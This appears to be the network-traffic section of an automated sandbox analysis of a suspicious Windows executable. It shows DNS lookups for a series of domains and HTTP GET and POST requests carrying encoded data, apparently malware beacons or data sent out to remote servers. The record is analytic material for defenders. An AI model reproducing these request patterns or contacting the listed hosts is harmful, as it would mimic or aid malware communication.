                                                                                                                                                            Nov 12, 2024 18:37:14.973520994 CET5376480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:14.978573084 CET80537643.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:15.611326933 CET80537643.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:15.611386061 CET5376480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:16.481422901 CET5376480192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:16.486403942 CET80537643.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:17.504029989 CET5376580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:17.509262085 CET80537653.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:17.509344101 CET5376580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:17.524045944 CET5376580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:17.530363083 CET80537653.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:17.530379057 CET80537653.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:18.161917925 CET80537653.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:18.163806915 CET5376580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:20.903378010 CET5376580192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:20.910978079 CET80537653.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:21.922252893 CET5376680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:21.927752018 CET80537663.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:21.929898977 CET5376680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:21.937359095 CET5376680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:21.942604065 CET80537663.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:22.562114954 CET80537663.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:22.562903881 CET80537663.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:22.563162088 CET5376680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:22.565264940 CET5376680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:37:22.570579052 CET80537663.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:30.668354988 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:30.673464060 CET805376735.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:30.673580885 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:30.681700945 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:30.686861038 CET805376735.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:32.004672050 CET805376735.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:32.004693031 CET805376735.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:32.004900932 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:32.126744986 CET805376735.156.117.131192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:32.126898050 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:32.127989054 CET5376780192.168.2.835.156.117.131
                                                                                                                                                            Nov 12, 2024 18:37:32.132921934 CET805376735.156.117.131192.168.2.8

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 12, 2024 18:33:41.977269888 CET5264653192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:33:42.519943953 CET53526461.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:33:59.151854992 CET5614453192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:33:59.391691923 CET53561441.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:12.750202894 CET5335453192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:34:12.913773060 CET53533541.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:20.984657049 CET5272853192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:34:21.003120899 CET53527281.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:35.609885931 CET5680153192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:34:36.398855925 CET53568011.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:34:50.363539934 CET6433053192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:34:50.539330006 CET53643301.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:04.219741106 CET6428853192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:35:04.259160995 CET53642881.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:18.705403090 CET5417953192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:35:19.199960947 CET53541791.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:33.143559933 CET5027453192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:35:33.176502943 CET53502741.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:46.469356060 CET6171853192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:35:46.482340097 CET53617181.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:54.559367895 CET5338353192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:35:54.593863964 CET53533831.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:08.691421986 CET5405653192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:36:08.886414051 CET53540561.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:22.783483982 CET6115653192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:36:22.790740967 CET53611561.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:37.079953909 CET5253853192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:36:37.323757887 CET53525381.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:51.069952965 CET5349753192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:36:51.109863997 CET53534971.1.1.1192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:37:12.391218901 CET6289253192.168.2.81.1.1.1
                                                                                                                                                            Nov 12, 2024 18:37:12.403470993 CET53628921.1.1.1192.168.2.8

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Nov 12, 2024 18:33:41.977269888 CET192.168.2.81.1.1.10x44ddStandard query (0)www.specialgift.asiaA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:33:59.151854992 CET192.168.2.81.1.1.10xe4f1Standard query (0)www.filelabel.infoA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:12.750202894 CET192.168.2.81.1.1.10x6629Standard query (0)www.longfilsalphonse.netA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:20.984657049 CET192.168.2.81.1.1.10x202dStandard query (0)www.multileveltravel.worldA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:35.609885931 CET192.168.2.81.1.1.10x45a1Standard query (0)www.40wxd.topA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:50.363539934 CET192.168.2.81.1.1.10xe9d0Standard query (0)www.vasehub.xyzA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:04.219741106 CET192.168.2.81.1.1.10x4c42Standard query (0)www.coffee-and-blends.infoA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:18.705403090 CET192.168.2.81.1.1.10xe432Standard query (0)www.tmstore.clickA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:33.143559933 CET192.168.2.81.1.1.10x9e70Standard query (0)www.softillery.infoA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:46.469356060 CET192.168.2.81.1.1.10x5857Standard query (0)www.gemtastic.shopA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:54.559367895 CET192.168.2.81.1.1.10x68f6Standard query (0)www.nad5.shopA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:36:08.691421986 CET192.168.2.81.1.1.10x28e2Standard query (0)www.luxe.guruA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:36:22.783483982 CET192.168.2.81.1.1.10x6c77Standard query (0)www.digitalbloom.infoA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:36:37.079953909 CET192.168.2.81.1.1.10xdfa6Standard query (0)www.amitayush.digitalA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:36:51.069952965 CET192.168.2.81.1.1.10xb7bbStandard query (0)www.moritynomxd.xyzA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:37:12.391218901 CET192.168.2.81.1.1.10xdaf8Standard query (0)www.tukaari.shopA (IP address)IN (0x0001)false

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Nov 12, 2024 18:33:42.519943953 CET1.1.1.1192.168.2.80x44ddNo error (0)www.specialgift.asiawww.specialgift.asia.s.strikinglydns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:33:42.519943953 CET1.1.1.1192.168.2.80x44ddNo error (0)www.specialgift.asia.s.strikinglydns.com35.156.117.131A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:33:42.519943953 CET1.1.1.1192.168.2.80x44ddNo error (0)www.specialgift.asia.s.strikinglydns.com18.157.120.97A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:33:59.391691923 CET1.1.1.1192.168.2.80xe4f1No error (0)www.filelabel.infofilelabel.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:33:59.391691923 CET1.1.1.1192.168.2.80xe4f1No error (0)filelabel.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:33:59.391691923 CET1.1.1.1192.168.2.80xe4f1No error (0)filelabel.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:12.913773060 CET1.1.1.1192.168.2.80x6629Name error (3)www.longfilsalphonse.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:21.003120899 CET1.1.1.1192.168.2.80x202dNo error (0)www.multileveltravel.worldmultileveltravel.worldCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:21.003120899 CET1.1.1.1192.168.2.80x202dNo error (0)multileveltravel.world3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:21.003120899 CET1.1.1.1192.168.2.80x202dNo error (0)multileveltravel.world15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:36.398855925 CET1.1.1.1192.168.2.80x45a1No error (0)www.40wxd.top40wxd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:36.398855925 CET1.1.1.1192.168.2.80x45a1No error (0)40wxd.top206.119.82.134A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:34:50.539330006 CET1.1.1.1192.168.2.80xe9d0No error (0)www.vasehub.xyz162.213.249.216A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:04.259160995 CET1.1.1.1192.168.2.80x4c42No error (0)www.coffee-and-blends.info217.160.0.231A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:19.199960947 CET1.1.1.1192.168.2.80xe432No error (0)www.tmstore.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:19.199960947 CET1.1.1.1192.168.2.80xe432No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:19.199960947 CET1.1.1.1192.168.2.80xe432No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:19.199960947 CET1.1.1.1192.168.2.80xe432No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:33.176502943 CET1.1.1.1192.168.2.80x9e70No error (0)www.softillery.infosoftillery.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:33.176502943 CET1.1.1.1192.168.2.80x9e70No error (0)softillery.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:33.176502943 CET1.1.1.1192.168.2.80x9e70No error (0)softillery.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:46.482340097 CET1.1.1.1192.168.2.80x5857Name error (3)www.gemtastic.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:35:54.593863964 CET1.1.1.1192.168.2.80x68f6No error (0)www.nad5.shop156.226.22.233A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:36:08.886414051 CET1.1.1.1192.168.2.80x28e2No error (0)www.luxe.guru52.20.84.62A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:36:37.323757887 CET1.1.1.1192.168.2.80xdfa6No error (0)www.amitayush.digitalghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:36:37.323757887 CET1.1.1.1192.168.2.80xdfa6No error (0)ghs.googlehosted.com142.250.185.179A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:36:51.109863997 CET1.1.1.1192.168.2.80xb7bbNo error (0)www.moritynomxd.xyz172.81.61.224A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:37:12.403470993 CET1.1.1.1192.168.2.80xdaf8No error (0)www.tukaari.shoptukaari.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:37:12.403470993 CET1.1.1.1192.168.2.80xdaf8No error (0)tukaari.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 12, 2024 18:37:12.403470993 CET1.1.1.1192.168.2.80xdaf8No error (0)tukaari.shop15.197.148.33A (IP address)IN (0x0001)false

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • www.specialgift.asia
                                                                                                                                                            • www.filelabel.info
                                                                                                                                                            • www.multileveltravel.world
                                                                                                                                                            • www.40wxd.top
                                                                                                                                                            • www.vasehub.xyz
                                                                                                                                                            • www.coffee-and-blends.info
                                                                                                                                                            • www.tmstore.click
                                                                                                                                                            • www.softillery.info
                                                                                                                                                            • www.nad5.shop
                                                                                                                                                            • www.luxe.guru
                                                                                                                                                            • www.digitalbloom.info
                                                                                                                                                            • www.amitayush.digital
                                                                                                                                                            • www.moritynomxd.xyz
                                                                                                                                                            • www.tukaari.shop

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.84971335.156.117.131806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:33:42.722141027 CET541OUTGET /s7e8/?TTd=yRNPZBU8fZA&mnYxMt=Qf5nKOHOS6pOo2hrLtSm+ampCv+PHNIpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneDowc/gh6rYJzY7Er9+/8bJZT8eqOHKV6gTsddlCzKVbHQ== HTTP/1.1
                                                                                                                                                            Host: www.specialgift.asia
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:33:43.955867052 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:33:43 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Content-Length: 2088
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Status: 404 Not Found
                                                                                                                                                            X-Request-Id: 618a2981cf5a603a1e340252859201b1
                                                                                                                                                            X-Runtime: 0.014474
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html> <head> <title>Page not found - Strikingly</title> <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <link href='https://fonts.googleapis.com/css?family=Montserrat|Open+Sans' rel='stylesheet' type='text/css'> <link href='//assets.strikingly.com/assets/404-styles.css' rel='stylesheet' type='text/css'> ...[if lte IE 7]> <style> .wide { padding-top: 160px; } </style> <![endif]--> <script type="text/javascript"> // Google Analytics (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-25124444-6', 'auto'); ga('set', 'anonymizeIp
                                                                                                                                                            Nov 12, 2024 18:33:43.955899954 CET212INData Raw: 27 2c 20 74 72 75 65 29 3b 0a 20 20 20 20 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 2c 20 7b 20 27 61 6e 6f 6e 79 6d 69 7a 65 49 70 27 3a 20 74 72 75 65 20 7d 29 3b 0a 20 20 20 20 2f 2f 20 45 6e 64 20 47 6f 6f 67 6c 65
                                                                                                                                                            Data Ascii: ', true); ga('send', 'pageview', { 'anonymizeIp': true }); // End Google Analytics </script> </head> <body> <div class='bg-logo'></div> <div class='wide light-text'> <div class='co
                                                                                                                                                            Nov 12, 2024 18:33:43.956121922 CET918INData Raw: 6c 32 27 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 2e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 70 3e 42 75 74 20 69 66 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 74 6f 20 62 75 69 6c 64 20 79
                                                                                                                                                            Data Ascii: l2'> <h1> PAGE NOT FOUND.</h1> <p>But if you're looking to build your own website, <br/>you've come to the right place.</p> <p class="buttons"> <a class='button dark-bg' href='https://www.strikingly.com/?utm_s


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.8497143.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:33:59.423479080 CET800OUTPOST /lclg/ HTTP/1.1
                                                                                                                                                            Host: www.filelabel.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.filelabel.info
                                                                                                                                                            Referer: http://www.filelabel.info/lclg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 2f 72 32 30 6b 4c 6f 57 52 4c 6d 7a 37 4b 4c 6c 66 47 69 68 6c 70 57 6f 78 67 5a 57 4d 76 77 67 7a 6d 38 39 66 47 75 51 6f 51 66 72 72 69 4d 73 4a 51 45 46 6c 58 7a 45 65 43 68 46 6c 5a 48 37 63 37 35 75 4d 48 4c 38 46 30 75 44 6e 41 73 4f 75 66 4b 66 66 72 6d 57 62 77 61 4a 50 70 77 6a 45 61 55 58 52 67 74 30 6e 5a 39 73 51 59 46 58 4e 53 4f 48 41 76 56 39 35 6c 62 42 72 46 77 66 4d 50 79 74 71 77 50 4e 31 37 77 37 51 6b 49 67 49 73 56 2b 52 69 45 33 67 6e 37 44 50 51 72 4e 79 4f 4f 4a 7a 75 6f 7a 62 30 7a 54 38 78 32 49 67 77 75 76 58 50 35 59 56 49 3d
                                                                                                                                                            Data Ascii: mnYxMt=nElwp91d2c4kZ/r20kLoWRLmz7KLlfGihlpWoxgZWMvwgzm89fGuQoQfrriMsJQEFlXzEeChFlZH7c75uMHL8F0uDnAsOufKffrmWbwaJPpwjEaUXRgt0nZ9sQYFXNSOHAvV95lbBrFwfMPytqwPN17w7QkIgIsV+RiE3gn7DPQrNyOOJzuozb0zT8x2IgwuvXP5YVI=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.8497153.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:02.023849010 CET820OUTPOST /lclg/ HTTP/1.1
                                                                                                                                                            Host: www.filelabel.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.filelabel.info
                                                                                                                                                            Referer: http://www.filelabel.info/lclg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 63 6a 32 79 33 54 6f 42 68 4c 6c 32 37 4b 4c 76 2f 47 6d 68 6c 6c 57 6f 77 56 43 57 2b 37 77 68 52 75 38 2b 65 47 75 46 6f 51 66 68 4c 69 4a 7a 5a 51 4e 46 6c 61 54 45 62 69 68 46 6c 4e 48 37 64 4c 35 75 64 48 49 39 56 30 57 49 48 41 71 44 4f 66 4b 66 66 72 6d 57 61 55 77 4a 50 78 77 6a 30 4b 55 46 7a 59 71 39 48 5a 2b 72 51 59 46 54 4e 53 4b 48 41 76 6e 39 34 70 39 42 6f 39 77 66 4f 58 79 74 2b 6b 4d 45 31 37 32 30 77 6c 76 76 59 70 6a 7a 52 6d 39 79 53 58 47 4d 75 38 67 4d 45 6a 6b 54 52 6d 75 77 62 63 59 54 2f 5a 41 4e 58 74 47 31 30 66 4a 47 43 64 6f 54 2f 35 77 31 64 30 72 62 66 4a 48 70 66 53 58 34 4d 32 35
                                                                                                                                                            Data Ascii: mnYxMt=nElwp91d2c4kZcj2y3ToBhLl27KLv/GmhllWowVCW+7whRu8+eGuFoQfhLiJzZQNFlaTEbihFlNH7dL5udHI9V0WIHAqDOfKffrmWaUwJPxwj0KUFzYq9HZ+rQYFTNSKHAvn94p9Bo9wfOXyt+kME1720wlvvYpjzRm9ySXGMu8gMEjkTRmuwbcYT/ZANXtG10fJGCdoT/5w1d0rbfJHpfSX4M25


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.8497163.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:04.581762075 CET1837OUTPOST /lclg/ HTTP/1.1
                                                                                                                                                            Host: www.filelabel.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.filelabel.info
                                                                                                                                                            Referer: http://www.filelabel.info/lclg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 63 6a 32 79 33 54 6f 42 68 4c 6c 32 37 4b 4c 76 2f 47 6d 68 6c 6c 57 6f 77 56 43 57 2b 44 77 67 6b 36 38 2b 39 2b 75 44 59 51 66 74 72 69 49 7a 5a 52 50 46 6c 79 66 45 62 76 63 46 6d 31 48 34 2b 44 35 36 2f 2f 49 30 56 30 57 56 58 41 76 4f 75 65 58 66 66 37 69 57 62 6b 77 4a 50 78 77 6a 32 43 55 41 52 67 71 37 48 5a 39 73 51 59 4a 58 4e 53 79 48 41 32 53 39 34 38 41 42 59 64 77 52 4f 48 79 6f 4e 4d 4d 50 31 37 30 7a 77 6c 33 76 5a 56 77 7a 52 71 48 79 53 50 6f 4d 74 73 67 4f 42 75 4c 44 54 75 2b 71 70 4d 34 65 6f 56 46 41 47 42 51 30 55 76 31 42 52 78 6c 53 2f 31 7a 77 4d 77 36 62 75 51 64 77 75 75 52 78 35 2f 76 67 38 38 6a 68 41 39 69 71 75 66 58 67 6c 46 51 43 41 64 67 56 37 35 79 36 76 62 67 78 78 78 76 2f 73 65 4d 76 56 6f 4e 79 48 55 47 6b 56 33 6b 5a 7a 36 73 49 2f 41 53 73 42 38 42 49 7a 72 57 6b 45 6c 37 6a 30 5a 56 59 31 4e 69 63 5a 47 6a 4b 7a 61 56 34 70 35 44 41 39 62 46 68 4a 2f 68 74 66 41 73 2f 31 47 77 4c 53 77 42 68 59 73 [TRUNCATED]
